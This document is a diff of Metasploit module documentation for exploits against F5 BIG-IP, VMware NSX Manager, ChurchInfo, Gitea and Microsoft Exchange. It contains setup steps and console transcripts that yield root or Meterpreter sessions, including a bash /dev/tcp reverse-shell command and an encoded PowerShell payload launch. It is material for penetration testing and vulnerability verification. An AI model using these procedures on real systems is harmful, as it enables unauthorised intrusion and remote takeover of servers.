+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET 1
+TARGET => 1
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
+[*] Using URL: http://10.0.0.179:8080/ePg5ECHuVD
+[*] Server started.
+
+[...wait for an authenticated user to click the link...]
+
+[*] Redirecting the admin to overwrite /var/run/config/timeout.sh; if successful, your session will come the next time a user logs in interactively
+```
+
+Once again, if you already have access, you can verify it worked:
+
+```
+[root@bigip:Active:Standalone] config # cat /etc/profile.d/timeout.sh 
+echo exec\(__import__\(\'base64\'\).b64decode[...]
+```
+
+Then, when a user logs in (ie, `ssh root@<target>` or on the console), you get
+a session:
+
+```
+[*] Redirecting the admin to overwrite /var/run/config/timeout.sh; if successful, your session will come the next time a user logs in interactively
+
+[...wait for a user to log in..]
+
+[*] Sending stage (40168 bytes) to 10.0.0.162
+[+] Deleted /var/run/config/timeout.sh
+[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:43902) at 2022-11-14 15:32:26 -0800
+
+meterpreter > getuid
+Server username: root
+```
+
+### F5 Big-IP 17.0.0.1 - Target 2 (Custom)
+
+Once again, set up the server:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET_HOST 10.0.0.162
+TARGET_HOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET 2
+TARGET => 2
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set FILENAME /tmp/testmsfmodule
+FILENAME => /tmp/testmsfmodule
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
+[*] Using URL: http://10.0.0.179:8080/PLvOVjkiVvXX
+[*] Server started.
+
+[...wait for an admin to visit that link...]
+
+[*] Redirecting the admin to overwrite /tmp/testmsfmodule with the payload
+```
+
+You can verify the file exists:
+
+```
+# cat /tmp/testmsfmodule 
+echo exec\(__import__\(\'base64\'\).b64decode[...]
+```
+
+Note that while this is written by root, you're in a pretty strict SELinux
+context so most obvious attacks (like writing to /etc/profile.d, /root/.ssh,
+etc., won't work).
@@ -19,6 +19,7 @@ For testing purposes, you can download a Github Enterprise image from the follow

 This module was specifically tested against version 2.8.0, which can be downloaded here:

+Download links are provided for reference only and are not maintained by the project. Utilize at your own risk!
 [https://github-enterprise.s3.amazonaws.com/esx/releases/github-enterprise-2.8.0.ova](https://github-enterprise.s3.amazonaws.com/esx/releases/github-enterprise-2.8.0.ova)

 Before you install the image, you must have a valid key. Start from here:
@@ -2,8 +2,9 @@

 Download the vulnerable version of OVA or ISO file from following URL. I strongly suggest you to choose OVA.

-[http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova](http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova)
-[http://s3-eu-west-1.amazonaws.com/innotim/forest-4.4.1-12.04.iso](http://s3-eu-west-1.amazonaws.com/innotim/forest-4.4.1-12.04.iso)
+Download links are provided for reference only and are not maintained by the project. Utilize at your own risk!
+http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova
+http://s3-eu-west-1.amazonaws.com/innotim/forest-4.4.1-12.04.iso

 ### Creating A Testing Environment

@@ -76,4 +77,4 @@ dns-nameservers 8.8.8.8
 meterpreter > getuid
 Server username: root
 meterpreter >
-```
+```
@@ -9,6 +9,7 @@ performs remote code execution as root by abusing the *extract* function used in

 ### Testing Environment

+Download links are provided for reference only and are not maintained by the project. Utilize at your own risk!
 Setup [Unraid 6.8.0](https://s3.amazonaws.com/dnld.lime-technology.com/stable/unRAIDServer-6.8.0-x86_64.zip)
 according to the [UnRAID Getting Started](https://wiki.unraid.net/UnRAID_6/Getting_Started) guide.

@@ -0,0 +1,173 @@
+## Vulnerable Application
+
+VMware Cloud Foundation contains a remote code execution vulnerability via XStream open source library [CVE-2022-39144](https://nvd.nist.gov/vuln/detail/CVE-2021-39144).
+VMware has evaluated the severity of this issue to be in the [Critical severity range](https://www.vmware.com/support/policies/security_response.html) with a maximum CVSSv3 base score of [9.8](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
+Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),
+a malicious actor can get remote code execution in the context of `root` on the appliance.
+
+VMware Cloud Foundation `3.x` and more specific NSX Manager Data Center for vSphere up to and including version `6.4.13`
+are vulnerable to Remote Command Injection.
+
+This module has been tested against VMware NSX Manager (NSX-V) with the specifications listed below:
+
+* VMware NSX Manager
+* Version `6.4.13`
+* Version `6.4.4`
+
+## Verification Steps
+
+Follow these instructions to install a vulnerable VMware NSX Manager on VirtualBox.
+* Go to [Download VMware NSX for vSphere 6.4.13](https://customerconnect.vmware.com/en/downloads/details?downloadGroup=NSXV_6413&productId=417&rPId=96480)
+* Note: You need to be a customer with valid VMware subscriptions
+* Download the ova file `VMware-NSX-Manager-6.4.13-19307994.ova`
+* Open VirtualBox and import the ova file
+* After sucessful import, start the VM and you have a VMware NSX Manager running which is accessible using url `https://<nsx-manager-ip>`
+* Credentials to login: user: `admin`, password: `default`
+* Use the module and options below to test the vulnerability...
+
+1. `use use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-Unix command or 1-Linux Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+No specific options.
+
+## Scenarios
+
+### VMware NSX Manager bash reverse shell
+
+```
+msf6 > use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options
+
+Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    443              yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
+                                       ne or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set rhosts 192.168.100.5
+rhosts => 192.168.100.5
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.5:443 can be exploited !
+[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
+[*] Executing Unix (In-Memory) with bash -c '0<&44-;exec 44<>/dev/tcp/192.168.100.7/4444;sh <&44 >&44 2>&44'
+[*] Command shell session 14 opened (192.168.100.7:4444 -> 192.168.100.5:42512) at 2022-11-05 10:33:37 +0000
+
+pwd
+/usr/lib/tanuki/bin
+whoami
+root
+exit
+[*] 192.168.100.5 - Command shell session 14 closed.
+
+```
+
+### VMware NSX Manager meterpreter session
+
+```
+msf6 > use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options
+
+Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    443              yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
+                                       ne or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set rhosts 192.168.100.5
+rhosts => 192.168.100.5
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.5:443 can be exploited !
+[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
+[*] Executing Linux Dropper
+[*] Using URL: http://192.168.100.7:8080/G5xrKmpiufcQdCt
+[*] Client 192.168.100.5 (curl/7.81.0) requested /G5xrKmpiufcQdCt
+[*] Sending payload to 192.168.100.5 (curl/7.81.0)
+[*] Command Stager progress - 100.00% done (121/121 bytes)
+[*] Sending stage (3045348 bytes) to 192.168.100.5
+[*] Meterpreter session 13 opened (192.168.100.7:4444 -> 192.168.100.5:42384) at 2022-11-05 10:29:30 +0000
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.100.5
+OS           : NSX Manager 6.4.13 (Linux 4.9.297)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+## Limitations
+The vulnerability check is limited in detecting that VMWare NSX Manager (NSX-V) is running without obtaining the version information.
+However all VMware NSX Manager versions up to `6.4.13` are vulnerable, except for `6.4.14`, so most detected targets are likely
+to be vulnerable.
@@ -0,0 +1,164 @@
+## Vulnerable Application
+* Project Homepage: http://www.churchdb.org/
+* Project Download: https://sourceforge.net/projects/churchinfo/files/
+
+ChurchInfo is an open source PHP application used to help churches manage systems and users of the church.
+There are various vulnerabilities in the ChurchInfo software which can be exploited by an
+attacker, however this module targets an authenticated remote code execution (RCE) vulnerability
+known as CVE-2021-43258 to execute code as the web daemon user (e.g. www-data).
+
+ChurchInfo v1.2.13, v1.2.14, and v1.3.0 contain functionality to email users listed in the ChurchInfo database
+with attachments. When preparing the email, a draft of the attachment is saved into
+`/tmp_attach/`, which is a web accessible folder under the ChurchInfo web root. Before the email is sent,
+the attachment draft can be loaded in the application. By uploading a malicious PHP file
+as an attachment and then browsing to it on the web server, RCE can be achieved.
+
+This vulnerability was assigned CVE-2021-43258. Version 1.3.0 was the latest version of ChurchInfo at the time
+of writing and there is presently no known patch for this issue.
+
+### Installation
+Installation guides are available on the SourceForge site at https://sourceforge.net/projects/churchinfo/files/.
+
+The following however is a quick and easy way to get most versions of ChurchInfo up and running using Docker,
+which should make it a lot easier to setup and also clean up once you are finished testing things out.
+
+1. `wget https://master.dl.sourceforge.net/project/churchinfo/churchinfo/1.3.0/churchinfo-1.3.0.tar.gz`
+1. `tar -xvf churchinfo-1.3.0.tar.gz`
+1. `sudo docker run -i -t -p "9090:80" -v ${PWD}/churchinfo:/app mattrayner/lamp:0.8.0-1804-php7`.
+1. `sudo docker ps -a` and find the container ID that was created and which is now running.
+1. `sudo docker exec -it *container ID* /bin/bash`
+1. Inside the new prompt:
+1. `mysqladmin -u root -p create churchinfo` and press the ENTER key when prompted for the password.
+1. `cd /app/churchinfo/SQL`
+1. `mysql -u root -p churchinfo < Install.sql` and press the ENTER key when prompted for the password.
+1. `apt-get install nano` if you want to use Nano.
+1. `nano /app/churchinfo/Include/Config.php`.
+1. Set the `$sUSER` variable to `'root'`.
+1. Set the `$sPASSWORD` variable to `''`.
+1. Set the `$sRootPath` variable to `'/churchinfo'`. This should be default though.
+1. Set the `$URL[0]` to `http://localhost/churchinfo/Default.php`.
+1. Exit out of `nano` and run `/etc/init.d/apache2 restart`
+1. Log in at `http://127.0.0.1:9090/churchinfo/Default.php` with the username `Admin` and password `churchinfoadmin`.
+1. This should cause the app to redirect to a password change form.
+1. Specify the old password, aka `churchinfoadmin` and then specify the new password twice and submit the form.
+1. Go to `http://127.0.0.1:9090/churchinfo/PersonEditor.php` and fill out the form with as much detail as possible.
+1. Click "Save and Add".
+
+## Verification Steps
+This module requires authenticated access to the application. After identifying a vulnerable
+ChurchInfo application, there MUST be a person entry available within the database. If there are no person
+entries within the database, it will not be possible to create a draft email. This draft email
+will be used to place the malicious attachment into the `/tmp_attach` directory for our exploit.
+
+1. Start `msfconsole`
+1. `use exploit/multi/http/churchinfo_upload_exec`
+1. Set the target `RHOST`, `APPBASE`, `USERNAME`, and `PASSWORD` values.
+1. Optional: Set the target `RPORT` if the ChurchInfo server is running on a different port than port 80.
+1. Optional: `set SSL true` if the target is using SSL for ChurchInfo.
+1. Select the payload of choice or leave default.
+1. Set the `LHOST` to your system.
+1. Run the exploit with `run`, enjoy the shell!
+
+## Options
+There are a handful of options which can be used to further configure the attack or other environmental uses.
+
+### USERNAME
+The username of a valid user account for the ChurchInfo application. Default is `admin`.
+
+### PASSWORD
+The password for a valid user account for the ChurchInfo application. Default is `churchinfoadmin` based on documentation.
+
+### APPBASE
+The base directory path to the ChurchInfo application. This can and will likely
+vary depending on how the application was installed. Default value is `/churchinfo/`.
+
+### EMAIL_SUBJ
+The subject of the draft email used for the exploit, the email is not sent. Default value is `Read this now!`.
+
+### EMAIL_MESG
+The message on the draft email which is used for the exploit. The email is not sent. Default value is `Hello there!`.
+
+## Scenarios
+If there are no person entries in the database, the exploit will fail. To help troubleshoot, enable verbose mode with the following:
+
+```
+set verbose true
+```
+
+This will enable additional information and details about the exploit as it is launched.
+
+### ChurchInfo v1.3.0 with MySQL 5.7.35 on Ubuntu Linux 18.04.2 LTS (Docker Image)
+```
+msf6 > use exploit/multi/http/churchinfo_upload_exec
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/churchinfo_upload_exec) > set RHOST 127.0.0.1
+RHOST => 127.0.0.1
+msf6 exploit(multi/http/churchinfo_upload_exec) > set RPORT 9090
+RPORT => 9090
+msf6 exploit(multi/http/churchinfo_upload_exec) > set PASSWORD testing123
+PASSWORD => testing123
+msf6 exploit(multi/http/churchinfo_upload_exec) > show options
+
+Module options (exploit/multi/http/churchinfo_upload_exec):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   EMAIL_MESG  Hello there!     yes       Email message in webapp
+   EMAIL_SUBJ  Read this now!   yes       Email subject in webapp
+   PASSWORD    testing123       yes       Password to login with
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS      127.0.0.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT       9090             yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI   /churchinfo/     yes       The location of the ChurchInfo app
+   USERNAME    admin            yes       Username for ChurchInfo application
+   VHOST                        no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.30.182.196   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Targeting
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/churchinfo_upload_exec) > set LHOST docker0
+LHOST => docker0
+msf6 exploit(multi/http/churchinfo_upload_exec) > run
+
+[*] Started reverse TCP handler on 172.18.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Target is ChurchInfo!
+[+] The target is vulnerable. Target is running ChurchInfo 1.3.0!
+[+] Logged into application as admin
+[*] Navigating to add items to cart
+[+] Items in Cart: Items in Cart: 2
+[+] Uploading exploit via temp email attachment
+[+] Exploit uploaded to /churchinfo/tmp_attach/ueNYs9.php
+[+] Executing payload with GET request
+[*] Sending stage (39927 bytes) to 172.18.0.2
+[+] Deleted ueNYs9.php
+[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:37790) at 2022-11-18 17:44:31 -0600
+
+
+meterpreter > getpid
+Current pid: 452
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : 8eeaa82293b4
+OS          : Linux 8eeaa82293b4 5.15.0-53-generic #59-Ubuntu SMP Mon Oct 17 18:53:30 UTC 2022 x86_64
+Meterpreter : php/linux
+meterpreter > 
+```
@@ -0,0 +1,229 @@
+## Vulnerable Application
+
+[Gitea](https://gitea.io/) is a painless self-hosted Git service community
+managed lightweight code hosting solution written in Go.
+
+This module has been tested successfully on Gitea versions:
+* 1.16.6 with Git 2.30.3 (Docker)
+* 1.16.6 with Git 2.30.2 (Windows 10)
+
+### Description
+
+This module exploits Git fetch command in Gitea repository migration process that leads to a remote command execution on the system.
+This vulnerability affect Gitea before 1.16.7 version.
+
+The migration process require valid Git repository address so the module will
+use the Gitea target itself by creating a temporary repository. This scenario
+won't work with [Gitea default configuration](https://github.com/go-gitea/gitea/blob/main/custom/conf/app.example.ini)
+because `ALLOW_LOCALNETWORKS` is disabled. However, it will be ignored when
+[ALLOWED_DOMAINS](https://github.com/go-gitea/gitea/blob/main/custom/conf/app.example.ini#L2289)
+is set, but it must be set to all domain with `*` for this scenario to work.
+
+There is an update in the Git-remote command line starting from version 2.34.0
+which refuses to update the branch pull request URL to the current path.
+
+```
+\testrepo.git>git version
+git version 2.34.0.windows.1
+\testrepo.git>git remote add -f master ./
+Updating master
+fatal: bad object refs/pull/0/head
+error: ./ did not send all necessary objects
+
+error: Could not fetch master
+```
+This causes the exploit to fail because Git-fetch will not executed if the
+Git-remote fail. Details of these limitation are explained
+[here](https://tttang.com/archive/1607/)
+
+### Source and Installers
+
+* [Source Code Repository](https://github.com/go-gitea/gitea/)
+* [Installers](https://dl.gitea.io/gitea/1.16.6)
+* [Docker](https://docs.gitea.io/en-us/install-with-docker/)
+
+### Docker installation
+1. create `docker-compose.yml` file
+```
+version: "3"
+
+networks:
+  gitea:
+    external: false
+
+services:
+  server:
+    image: gitea/gitea:1.16.6
+    container_name: gitea
+    environment:
+      - USER_UID=1000
+      - USER_GID=1000
+    restart: always
+    networks:
+      - gitea
+    volumes:
+      - ./gitea:/data
+      - /etc/timezone:/etc/timezone:ro
+      - /etc/localtime:/etc/localtime:ro
+    ports:
+      - "3000:3000"
+      - "222:22"
+```
+2. run `docker-compose up`
+3. append `ALLOW_LOCALNETWORKS` in the configuration file.
+```
+:~$ cat << EOF >> gitea/gitea/conf/app.ini
+> [migrations]
+> ALLOW_LOCALNETWORKS = true
+> EOF
+```
+4. Navigate to the localhost port 3000 and finish the installation. Note that
+   the first registered user will automatically become administrator so make
+   sure to set the administrator username and password upon installation.
+
+## Verification Steps
+
+1. Navigate to `/user/sign_up` and register normal user
+2. Do: `use unix/webapp/gitea_git_fetch_rce`
+3. Do: `set RHOSTS [ips]`
+4. Do: `set LHOST [lhost]`
+5. Do: `set USERNAME [username]`
+6. Do: `set PASSWORD [password]`
+7. Do: `run`
+8. You should get a shell.
+
+## Options
+
+### USERNAME
+The Gitea valid username to authenticate
+
+### USERNAME
+The Gitea valid password to authenticate
+
+### HTTPDELAY
+Number of seconds the web server will wait to deliver payload (default: 12)
+
+## Scenarios
+### Successful exploitation of Gitea 1.16.6 on Docker
+
+```
+msf6 > use exploit/multi/http/gitea_git_fetch_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set rhosts 172.17.0.2
+rhosts => 172.17.0.2
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set lhost 172.17.0.1
+lhost => 172.17.0.1
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set username msf
+username => msf
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set password qwerty
+password => qwerty
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set verbose true
+verbose => true
+msf6 exploit(multi/http/gitea_git_fetch_rce) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 1.16.6
+[*] Using URL: http://172.17.0.1:8080/
+[*] Server started.
+[*] Adding hardcoded uri /api/v1/version
+[*] Adding hardcoded uri /api/v1/settings/api
+[*] Adding hardcoded uri /api/v1/repos/msf/d8s1ZLsl
+[*] Adding hardcoded uri /api/v1/repos/msf/d8s1ZLsl/pulls
+[*] Adding hardcoded uri /api/v1/repos/msf/d8s1ZLsl/topics
+[*] Creating repository "u8W2Lu24p"
+[+] Repository created
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgAB..."]
+[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAA...
+[*] Command Stager progress - 100.00% done (833/833 bytes)
+[*] Migrating repository
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3020772 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:60744) at 2022-10-03 18:40:15 +0700
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: git
+```
+
+### Successful exploitation of Gitea 1.16.6 on Windows 10
+
+```
+msf6 > use exploit/multi/http/gitea_git_fetch_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set target 2
+target => 2
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set rhosts 192.168.0.21
+rhosts => 192.168.0.21
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set lhost 192.168.0.104
+lhost => 192.168.0.104
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set username yo
+username => yo
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set password password
+password => password
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set verbose true
+verbose => true
+msf6 exploit(multi/http/gitea_git_fetch_rce) > run
+
+[*] Started reverse TCP handler on 192.168.0.104:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 1.16.6
+[*] Using URL: http://192.168.0.104:8080/
+[*] Server started.
+[*] Adding hardcoded uri /api/v1/version
+[*] Adding hardcoded uri /api/v1/settings/api
+[*] Adding hardcoded uri /api/v1/repos/yo/Gu5em72aTm5
+[*] Adding hardcoded uri /api/v1/repos/yo/Gu5em72aTm5/pulls
+[*] Adding hardcoded uri /api/v1/repos/yo/Gu5em72aTm5/topics
+[*] Creating repository "ExcLF0xBxG"
+[+] Repository created
+[*] Executing command: powershell.exe -nop -w hidden -noni -ep bypass "&([...
+[*] Migrating repository
+[*] Powershell session session 1 opened (192.168.0.104:4444 -> 192.168.0.21:49499) at 2022-10-03 19:03:38 +0700
+[*] Migrating repository
+[*] Powershell session session 1 opened (192.168.0.104:4444 -> 192.168.0.21:49499) at 2022-10-03 19:03:38 +0700
+[*] Server stopped.
+
+PS C:\Users\msf\Downloads\data\gitea-repositories\yo\gu5em72atm5.git> whoami
+msf
+```
+
+### Failed exploitation due to migration settings
+
+```
+msf6 > use exploit/multi/http/gitea_git_fetch_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set rhosts 172.17.0.2
+rhosts => 172.17.0.2
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set lhost 172.17.0.1
+lhost => 172.17.0.1
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set username msf
+username => msf
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set password qwerty
+password => qwerty
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set verbose true
+verbose => true
+msf6 exploit(multi/http/gitea_git_fetch_rce) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 1.16.6
+[*] Using URL: http://172.17.0.1:8080/
+[*] Server started.
+[*] Adding hardcoded uri /api/v1/version
+[*] Adding hardcoded uri /api/v1/settings/api
+[*] Adding hardcoded uri /api/v1/repos/msf/9JDwz2xTngq7w
+[*] Adding hardcoded uri /api/v1/repos/msf/9JDwz2xTngq7w/pulls
+[*] Adding hardcoded uri /api/v1/repos/msf/9JDwz2xTngq7w/topics
+[*] Creating repository "P7EpcvA"
+[+] Repository created
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAA..."]
+[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAAB...
+[*] Command Stager progress - 100.00% done (833/833 bytes)
+[*] Migrating repository
+[*] Server stopped.
+[-] Exploit aborted due to failure: unexpected-reply: Unable to migrate repo:
+You can not import from disallowed hosts, please ask the admin to check
+ALLOWED_DOMAINS/ALLOW_LOCALNETWORKS/BLOCKED_DOMAINS settings.
+[*] Exploit completed, but no session was created.
+```
@@ -0,0 +1,66 @@
+## Vulnerable Application
+
+This module chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker
+to interact with the Exchange Powershell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to
+obtain code execution (CVE-2022-41082). This exploit only support Exchange Server 2019.
+
+By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server.
+
+This vulnerability affects:
+
+  * Exchange 2013 CU23 < 15.0.1497.44
+  * Exchange 2016 CU22 < 15.1.2375.37
+  * Exchange 2016 CU23 < 15.1.2507.16
+  * Exchange 2019 CU11 < 15.2.986.36
+  * Exchange 2019 CU12 < 15.2.1118.20
+
+*Source: [Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: November 8, 2022 (KB5019758)][1]*
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/windows/http/exchange_proxynotshell_rce`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set USERNAME [USERNAME]`
+5. Do: `set PASSWORD [PASSWORD]`
+6. Do: `run`
+
+## Advanced Options
+### EemsBypass
+
+Technique to bypass the EEMS rule.
+
+**none** -- Make no attempt to bypass the EEMS rule. This can be used with the `check` method to determine if the EEMS 
+M1 rule is applied.
+**IBM037v1** -- Use IBM037 encoding combined with the `X-Up-Devcap-Post-Charset` header and `UP` User-Agent prefix. See
+[ProxyNotRelay][2] for more information.
+
+### MaxBackendRetries
+
+The maximum number of times to retry for targeting the backend server with the SSRF. This is useful in environments
+where a Data Availability Group (DAG) is in place and causes requests to be sent to a random backend server.
+
+## Scenarios
+
+### Version and OS
+
+```
+msf6 exploit(windows/http/exchange_proxynotshell_rce) > set RHOSTS 192.168.159.11
+RHOSTS => 192.168.159.11
+msf6 exploit(windows/http/exchange_proxynotshell_rce) > set USERNAME aliddle
+USERNAME => aliddle
+msf6 exploit(windows/http/exchange_proxynotshell_rce) > set PASSWORD Password1!
+PASSWORD => Password1!
+msf6 exploit(windows/http/exchange_proxynotshell_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Sending stage (175686 bytes) to 192.168.159.11
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.11:7290) at 2022-11-18 17:32:18 -0500
+
+meterpreter > 
+```
+
+[1]: https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-8-2022-kb5019758-2b3b039b-68b9-4f35-9064-6b286f495b1d
+[2]: https://rw.md/2022/11/09/ProxyNotRelay.html
@@ -10,9 +10,9 @@ This vulnerability affects:

  * Exchange 2013 CU23 < 15.0.1497.15
  * Exchange 2016 CU19 < 15.1.2176.12
-  * Exchange 2016 CU20 < 15.1.2242.5
+  * Exchange 2016 CU20 < 15.1.2242.8
  * Exchange 2019 CU8 < 15.2.792.13
